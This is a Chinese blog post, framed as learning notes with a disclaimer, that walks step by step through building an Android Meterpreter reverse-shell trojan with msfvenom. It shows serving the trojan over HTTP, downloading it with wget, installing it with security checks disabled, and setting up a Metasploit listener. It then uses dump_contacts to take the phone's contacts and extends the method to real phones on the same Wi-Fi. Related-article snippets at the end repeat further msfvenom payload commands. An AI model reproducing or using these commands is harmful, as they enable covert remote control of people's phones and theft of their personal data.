我的MSF之Android木马渗透的学习笔记

最新推荐文章于 2024-04-05 14:34:21 发布
最新推荐文章于 2024-04-05 14:34:21 发布
阅读量3.8k 收藏 37
点赞数 8
分类专栏: 保护国家网络安全 文章标签: android kali msf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46367450/article/details/131090921
版权

免责声明:以下内容仅供学习参考,如果用于任何非法途径,后果自负,希望大家做一个遵纪守法的好公民,一起保护国家的的网络安全!!!

文章目录

环境准备

攻击机:kali

靶机:Android

一、入侵操作

1.木马制作

通过msfvenom制作安卓木马

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.9.136.152 LPORT=4444 R >android_yuanboss.apk

2.开启http服务

kali 终端输入以下命令开启http服务

python3 -m http.server 80

3.靶机下载木马

由于此安卓虚拟机bug问题,我们无法在该靶机的浏览器中输入对应 ip去下载木马,而是需要到终端输入命令来下载木马:

终端下载命令:

wget 10.9.136.152/android_yuanboss.apk

请添加图片描述

但是发现下载失败,因为android当前目录下是只读文件系统,我们如果需要下载东西,就需要到sdcard目录中进行下载:

cd sdcard
wget 10.9.136.152/android_yuanboss.apk

如图所示,表示下载成功:

请添加图片描述

4.安装木马

打开Android中的文件之后,如图所示:

请添加图片描述

最后一个就是我们下载的木马,我们直接傻瓜式安装即可,其中注意安装过程中取消安全检查。

安装完之后,可以在桌面中看到如下图标:

请添加图片描述

5.监听的配置

1.选择后门模块(必须进行这一步模块的选择,否则无法进行后面的步骤

use exploit/multi/handler

2.设置攻击载荷 payload(和创建木马的载荷一样)

set payload android/meterpreter/reverse_tcp

3.设置攻击机的 ip (和创建木马时的 ip 一样)

 set lhost 10.9.136.152

4.设置攻击机的端口 port (和创建木马时的端口一样)

set lport 4444

上述监听配置如图所示:

请添加图片描述

6.启动监听

run

如图所示:

请添加图片描述

7.木马上线

在靶机中打开木马程序

8.监听成功

请添加图片描述

二、渗透操作

1.获取手机通讯录

首先在靶机中的通讯录中添加信息,然后运行木马程序,然后到 kali中运行如下命令:

dump_contacts

请添加图片描述

根据日志可以得知,通讯录信息存放到了当前目录下的 contacts_dump_20230607062727.txt文件中

接下来通过 cat命令查看该文件:

请添加图片描述

我们可以看到,已经成功获取通讯录信息

三、手机植入木马实战

实操逻辑和上述内容是一样的,只要确保 kali 可以与手机的 ip 相连,就可以实现木马植入。

所以难点在于如何使我们的 kali 和 手机相连,让 kali 与安卓手机相连的流程如下:

如下图所示,我们只需要确保我们的电脑与安卓手机连接同一个无线路由器,为了确保物理机中的kali能和安卓手机处于同一个网段,我们需要给kali设置为桥接模式,并且在虚拟网络编辑器中给桥接网络设置网卡为无线网卡,无线网卡的名字可以在物理机的批处理窗口中通过 ipconfig /all 查看,无线局域网适配器 WLAN的描述内容即为无线网卡名称 。配置好虚拟机之后,查看 kali 与安卓手机的ip地址,即可发现处于同一网段,并且可以kali可以ping通安卓手机的 ip

请添加图片描述

确保 kali 与 安卓 相连成功之后,执行上面的入侵操作与渗透操作即可!

四、总结

Android入侵与Windows是一样的,只需要确保攻击机器与靶机之间网络可以连通,就可以实现渗透利用。

要注意Android文件只有只读权限,我们需要切换到sdcard目录,才能实现文件的下载

文件下载的命令是:

wget ip/文件名
例如: weget 10.9.136.152/android_yuanboss.apk

执行上面的入侵操作与渗透操作即可!

yuan_boss
关注
  • 8
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 11
    评论
专栏目录
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。前不久MSF从4.7升级到MSF5.0,其中改进了数据库的处理逻辑,优化了msfconsole终端操作,并将PostgreSQL作为一个RESTful服务单独运行。此外还加入一个Web服务框架,新的免杀模块,优化了控制功能等。下面小白总结了一下在渗透测试中,使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
Android应用植入后门 实现msf控制(附带所需工具和常见坑解决办法)
weixin_72849553的博客
12-21 1881
本人刚入msf坑不久,对于Android渗透比较感兴趣,于是在网上寻找了很久资料,但是发现很多实现方法都会出现各种奇怪报错,于是我花了点时间,在外面的世界找解决方案,总算实现成功,故整理文章,供正在困惑和迷茫中挣扎的小伙伴们互相交流。下面进入正题:我们的思路是对一个安卓应用注入msf生成的payload后门,并实现内网范围或是外网范围内的持续控制,这样就会实现后门随正常应用启动,但不易被发现。文中会提供一些思路拓展,如果需要,我可以再展开来讲。
手机android.sys木马,使用kali生成木马入侵安卓手机
weixin_42353186的博客
05-29 6268
大家好,我是T0reAd今天给大家带来的是使用kali生成行动开始先查看kali的ip,我的是1.114然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk5555是设置的端口,可以自己更改显示这个说明已经生成成功了然后启动msfmsfconsol...
Kali利用MSF渗透安卓手机_kali入侵安卓手机,网易严选网络安全开发三面面经
最新发布
m0_60607397的博客
04-05 839
Python编程学习学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
利用msfvenom生成后门木马
qq_28147861的博客
01-18 2680
msfvenom工具介绍 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenomMsfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。 用msfvenom生成一个PHP语言的PNG图片木马 代码:msfvenom -p php/meterpreter/reverse_tcp lh
web渗透学习笔记
shy的博客
10-15 800
一、sqlmap -p 指定注入点 –technique 指定注入类型 B:Boolean-based blind(布尔型注入) E:Error-based(报错型注入) U:Union query-based(可联合查询注入) S:Stacked queries(可多语句查询注入) T:Time-based blind(基于时间延迟注入) Q:Inline queries(嵌套查询注入) oracle 默认的端bai口号是1521 ...
Android系统木马隐藏及检测技术
05-24
Android系统木马隐藏及检测技术,学习课程,知识全面丰富
msf生成木马攻击android手机
afei001
03-21 6522
实验环境 攻击机:kali IP:192.168.43.5 靶机:oppor9st 生成木马攻击android手机 1.在kali上生成反弹木马 root@afei:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.5 lport=6666 R > hello.apk [...
利用MSF攻击Android
qq_45746768的博客
07-08 3667
利用Metasploit攻击Android
msf使用木马控制android手机
my_name_is_sy的博客
05-18 2081
使用msfvenom生成木马控制手机
MSF - Android
ShenMian000
10-05 776
更新中 Step 1 生成后门 msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地IP> LPORT=<监听Port> R -o backdoor.apk 当目标执行后门时,MSF会向后门发送Payload。当Payload载入后即可开始控制目标。 Step 2 开启监听任务 msf > use use exp...
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf 渗透测试
06-05
msf渗透
kali 渗透msf
11-14
kali渗透测试利器
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
MSFconsole(msf渗透神器)window版本,稀缺资源。
Msfvenom使用指南
m0_57221101的博客
02-08 5984
参数总结 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2. –l 查看所有payload encoder nops。 3. –f (- -help-formats) 输出文件格式。 (- -help-form
msfvenom 生成php木马,msfvenom 木马生成大全
weixin_42220853的博客
03-26 2344
Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST= ...
木马程序攻击+利用Windows内核漏洞提权
m0_71745258的博客
01-22 2639
再次声明,此学习路线主打就业方向,如果只是感兴趣,想成为什么黑客的朋友可以划走了!网络安全≠黑客很多人上来就说想做想入行网络安全,但是连方向都没搞清楚就开始学习,最终也只是会无疾而终!黑客是一个大的概念,里面包含了许多方向,不同的方向需要学习的内容也不一样。网络渗透、逆向分析、漏洞攻击、内核安全、移动安全、破解PWN等众多子方向。今天的这篇,主要是针对网络渗透方向,其他方向仅供参考,学习路线并不完全一样,有机会的话我再单独梳理。
msf 渗透工具学习材料
08-20
MSF(Metasploit Framework)是一款强大的开源渗透测试工具,用于测试和评估计算机系统的安全性。学习MSF渗透工具有助于提高对网络安全的理解和技能。以下是一些学习MSF渗透工具的材料和方法: 1. 官方文档:Metasploit官方网站提供了完整的文档,包括用户指南、参考手册和教程。这些文档详细介绍了MSF的各个模块、命令、选项和使用方法。 2. 书籍:有一些书籍专门介绍了MSF的原理、用法和实例。例如《Metasploit: The Penetration Tester's Guide》,该书提供了深入的MSF知识,并帮助读者掌握渗透测试的技巧。 3. 在线教程:互联网上有许多免费的MSF教程和视频教程可供学习。通过这些教程,可以了解MSF的基本操作和常用技巧,并学习如何使用不同的模块和插件。 4. 实践演练:通过自己的实践和演练来学习MSF是非常重要的。可以使用虚拟机环境搭建实验环境,模拟真实的渗透测试场景,并运用MSF进行实际的渗透测试工作。 5. 社区和论坛:Metasploit拥有活跃的社区和论坛,可以与其他渗透测试者交流经验和学习心得。在这些社区中,可以获取到最新的MSF资讯、漏洞信息和实践技巧。 需要注意的是,渗透测试是一项敏感和专业的工作,必须遵守法律和道德准则。在学习和使用MSF工具时,务必要了解和遵守相关的法律法规,避免非法使用和侵犯他人的隐私和安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yuan_boss

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值